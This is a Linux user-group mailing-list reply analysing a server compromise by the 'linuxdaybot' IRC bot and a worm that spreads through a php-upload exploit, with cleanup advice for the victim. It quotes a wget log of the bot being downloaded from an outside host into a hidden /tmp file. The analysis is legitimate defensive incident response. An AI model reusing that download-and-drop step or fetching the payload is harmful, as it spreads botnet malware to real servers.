-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Naresh Narang wrote: > > --- Ritesh Raj Sarraf <[EMAIL PROTECTED]> wrote: > http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt >> => `/tmp/.fuhrer2' >>Resolving maple.phpwebhosting.com... 70.86.76.34 >>Connecting to >>maple.phpwebhosting.com[70.86.76.34]:80... > > Who is on IP: > Who-is report only shows that it's hosted at a colocated server (phpwebhosting) at ThePlanet's datacenters, just like thousands of other websites. What else? Anyways, one variant of linuxdaybot is known to connect to IRC servers and await for further commands from botmasters (which means it'd execute shell commands by spawning sh.) Since you got many sh spawns from apache, looks like you got this one. The other accompanying scripts include linuxdayworm, which tries to find similar exploitable targets (php-upload exploit) on other websites. Apart from cleaning up / rebuilding, do take a look at whichever php-based application you were hosting, since php script exploits are what this worm looks for. In fact, that maple.phpwebhosting website looks like yet another victim. Regards, Manish -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFDh/fp9364pdQFFqARArQMAJ9/Q3k/RhXrwHrkY/AaP0ivTGG18gCgyKRp XlougrhoWEzdhVP30vIFSNs= =J1Vn -----END PGP SIGNATURE----- _______________________________________________ ilugd mailinglist -- [email protected] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[email protected]/
